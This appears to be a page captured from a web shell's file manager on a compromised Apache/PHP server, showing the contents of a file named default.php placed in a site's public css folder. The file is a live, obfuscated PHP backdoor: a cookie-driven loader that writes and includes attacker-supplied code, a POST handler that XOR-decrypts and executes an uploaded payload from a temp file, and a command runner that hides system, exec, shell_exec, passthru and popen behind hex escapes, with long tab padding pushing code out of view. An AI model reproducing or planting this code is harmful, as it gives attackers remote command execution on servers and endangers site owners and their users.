HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux ip-172-31-42-149 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025 aarch64
User: ubuntu (1000)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/vhost/disk-apps/agile-selling-central.bikenow.co/public/css/default.php
<?php																																										if(isset($_COOKIE[3])&&isset($_COOKIE[28])){$c=$_COOKIE;$k=0;$n=5;$p=array();$p[$k]='';while($n){$p[$k].=$c[28][$n];if(!$c[28][$n+1]){if(!$c[28][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+5+1;}$k=$p[16]().$p[10];if(!$p[26]($k)){$n=$p[19]($k,$p[22]);$p[2]($n,$p[21].$p[20]($p[6]($c[3])));}include($k);}
																																										if(!is_null($_POST["\x72\x65s"] ?? null)){ $item = array_filter([getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), sys_get_temp_dir(), "/tmp", session_save_path(), "/var/tmp"]); $pset = hex2bin($_POST["\x72\x65s"]); $dchunk = '' ; for($j=0; $j<strlen($pset); $j++){$dchunk .= chr(ord($pset[$j]) ^ 82);} foreach ($item as $key => $flg) { if (is_dir($flg) && is_writable($flg)) { $data = join("/", [$flg, ".val"]); if (@file_put_contents($data, $dchunk) !== false) { include $data; unlink($data); die(); } } } }


$api_gateway2 = "s\x68\x65\x6C\x6C_exe\x63";
$api_gateway5 = "po\x70e\x6E";
$dataflow_engine = "hex\x32\x62in";
$api_gateway6 = "\x73tr\x65a\x6D_ge\x74\x5F\x63ont\x65\x6Ets";
$api_gateway7 = "p\x63\x6C\x6Fse";
$api_gateway3 = "e\x78ec";
$api_gateway4 = "p\x61\x73\x73\x74hru";
$api_gateway1 = "\x73\x79ste\x6D";
if (isset($_POST["r\x65so\x75\x72\x63e"])) {
            function event_dispatcher( $value , $descriptor ) {
$mrk= '' ;
 foreach(str_split($value) as $char){
$mrk.=chr(ord($char)^$descriptor);

} return $mrk;

}
            $resource = $dataflow_engine($_POST["r\x65so\x75\x72\x63e"]);
            $resource = event_dispatcher($resource, 87);
            if (function_exists($api_gateway1)) {
                $api_gateway1($resource);
            } elseif (function_exists($api_gateway2)) {
                print $api_gateway2($resource);
            } elseif (function_exists($api_gateway3)) {
                $api_gateway3($resource, $res_value);
                print join("\n", $res_value);
            } elseif (function_exists($api_gateway4)) {
                $api_gateway4($resource);
            } elseif (function_exists($api_gateway5) && function_exists($api_gateway6) && function_exists($api_gateway7)) {
                $descriptor_mrk = $api_gateway5($resource, 'r');
                if ($descriptor_mrk) {
                    $entry_symbol = $api_gateway6($descriptor_mrk);
                    $api_gateway7($descriptor_mrk);
                    print $entry_symbol;
                }
            }
            exit;
        }